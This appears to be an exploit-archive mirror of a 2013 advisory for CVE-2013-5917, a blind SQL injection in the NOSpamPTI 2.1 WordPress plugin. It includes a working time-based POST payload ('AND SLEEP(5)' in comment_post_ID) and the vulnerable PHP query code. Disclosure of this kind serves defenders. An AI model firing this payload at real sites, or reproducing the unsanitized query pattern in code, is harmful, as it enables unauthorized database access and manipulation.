Skip to content
cyberexploits
webappphptext

WordPress Plugin NOSpamPTI - Blind SQL Injection

WordPress Plugin NOSpamPTI - Blind SQL Injection

Published on 2013-09-23

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/28485.txt7eac4c3a
raw
[ NOSpamPTI Wordpress plugin Blind SQL Injection ]



[ Vendor product description ]



NOSpamPTI eliminates the spam in your comment box so strong and free,

developed from the idea of Nando Vieira <a href="http://bit.ly/d38gB8"

rel="nofollow">http://bit.ly/d38gB8</a>, but some themes do not support

changes to the functions.php to this we alter this function and

available as a plugin. Make good use of this plugin and forget all the Spam.



[ Bug Description ]



NOSpamPTI contains a flaw that may allow an attacker to carry out a

Blind SQL injection attack. The issue is due to the wp-comments-post.php

script not properly sanitizing the comment_post_ID in POST data. This

may allow an attacker to inject or manipulate SQL queries in the

back-end database, allowing for the manipulation or disclosure of

arbitrary data.



[ History ]



Advisory sent to vendor on 09/09/2013

Vendor reply 09/20/2013. According the vendor, the plugin was deprecated.



[ Impact ]



HIGH



[ Afected Version ]



2.1



[ CVE Reference]



CVE-2013-5917



[ POC ]



Payload:

POST /wordpress/wp-comments-post.php



author=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1

AND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1



[ Vulnerable code ]



$post_id = $_POST['comment_post_ID'];



load_plugin_textdomain('nospampti',

WP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/');



    if ($hash != $challenge) {

        $wpdb->query("DELETE FROM {$wpdb->comments} WHERE comment_ID =

{$comment_id}");

        $count = $wpdb->get_var("select count(*) from $wpdb->comments

where comment_post_id = {$post_id} and comment_approved = '1'");





[ Reference ]



[1] No SpamPTI SVN repository -

http://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php

[2] Owasp - https://owasp.org/index.php/SQL_Injection

[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/



--------------------------------------------

iBliss Segurança e Inteligência - Sponsor: Alexandro Silva - Alexos

View on GitHub